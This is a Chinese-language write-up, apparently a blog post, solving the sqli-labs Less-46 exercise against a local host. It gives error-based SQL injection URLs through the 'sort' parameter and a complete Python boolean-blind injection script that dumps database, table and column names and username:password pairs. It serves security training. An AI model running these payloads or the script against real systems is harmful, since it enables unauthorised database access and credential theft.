1、直接使用报错注入:
数据库名:
http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,(select%20database()%20),0x7e)))
用户名:
http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,(select%20user()%20),0x7e)))
表名:
http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat((select%20group_concat(0x7e,table_name,0x7e)%20from%20information_schema.tables%20where%20table_schema=%27security%27))))
因为extractvalue只能容纳32个字节,我们需要将后面的字段截取出:
http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(0x7e,table_name,0x7e)%20from%20information_schema.tables%20where%20table_schema=%27security%27),32,64))))
users表字段名:
http://127.0.0.1/ess-46/index.php?sort=(extractvalue(1,concat((select%20group_concat(0x7e,column_name,0x7e)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27))))
users表数据:
这里我们分开截取。
前32:
http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(username,0x3a,password)%20from%20users),1,32))))
32-64:
http://127.0.0.1/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(username,0x3a,password)%20from%20users),32,64))))
2、布尔盲注
编写python脚本:
import requests
from bs4 import BeautifulSoup
def get_username(resp):
"""
从响应中提取用户名
:param resp: 响应内容
:return: 用户名
"""
soup = BeautifulSoup(resp, 'html.parser')
try:
username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].text
except IndexError:
username = ""
return username
def send_request(payload):
"""
发送HTTP请求
:param payload: 请求的URL
:return: 响应对象
"""
try:
resp = requests.get(payload, timeout=5)
return resp
except requests.RequestException as e:
print(f"请求失败: {e}")
return None
def inject(url, query_template):
"""
通用的SQL注入函数,使用二分法猜测字符
:param url: 目标URL
:param query_template: SQL注入模板
:return: 注入结果
"""
data = ''
i = 1
while True:
left = 32
right = 127
mid = (left + right) // 2
while left < right:
query = query_template.format(i=i, mid=mid)
payload = f"{url}{query}"
resp = send_request(payload)
if resp and 'Dumb' == get_username(resp.text):
left = mid + 1
else:
right = mid
mid = (left + right) // 2
if mid == 32:
break
data += chr(mid)
i += 1
return data
def inject_database(url):
"""
获取数据库名
:param url: 目标URL
"""
query_template = "sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "
database_name = inject(url, query_template)
print(f"数据库名: {database_name}")
def inject_tables(url):
"""
获取所有表名
:param url: 目标URL
"""
query_template = "sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "
tables = inject(url, query_template)
print(f"表名有: {tables}")
def inject_column(url, table_name):
"""
获取指定表的所有列名
:param url: 目标URL
:param table_name: 表名
"""
query_template = f"sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='{table_name}'),{{i}},1))>{{mid}},id,username) -- "
columns = inject(url, query_template)
print(f"{table_name}表中的字段有: {columns}")
def inject_data(url, table_name):
"""
获取指定表的所有数据
:param url: 目标URL
:param table_name: 表名
"""
query_template = f"sort=if(ascii(substr((select group_concat(username,':',password) from {table_name}),{{i}},1))>{{mid}},id,username) -- "
user_data = inject(url, query_template)
if user_data == "":
print("该表中没有数据!")
else:
print(f"表{table_name}中的数据按照username:password的形式有: {user_data}")
def main():
"""
主函数
"""
url = 'http://127.0.0.1/Less-46/index.php?'
# 获取数据库名
inject_database(url)
# 获取表名
inject_tables(url)
# 获取表名后,输入具体表名
table_name = input("请输入需要获取数据的表名:")
# 获取表的列名
inject_column(url, table_name)
# 获取表的数据
inject_data(url, table_name)
if __name__ == '__main__':
main()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
